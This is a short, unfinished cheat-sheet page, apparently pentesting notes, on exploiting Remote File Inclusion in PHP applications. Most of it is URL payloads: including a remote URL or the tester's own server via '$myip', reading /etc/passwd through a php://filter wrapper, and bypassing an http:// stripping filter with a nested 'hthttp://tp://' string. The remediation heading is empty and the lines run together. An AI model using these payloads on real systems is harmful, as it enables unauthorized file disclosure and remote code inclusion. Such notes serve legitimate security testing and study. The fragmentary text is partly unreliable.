Remote File Inclusion (WIP)
#It's searching for a file
http://$url/$query?$param=hola.php
#We can do a redirection to another site
http://$url/$query?$param=http://$url
#Or a redirection to a local server
http://$url/$query?$param=//$myip...
$file = str_replace( array( "http://", "https://" ), "", $file );
...
http://$url/$query?$param=php://filter/resource=/etc/passwdhttp://$url/$query?$param=hthttp://tp://$urlRemediation Actions
Last updated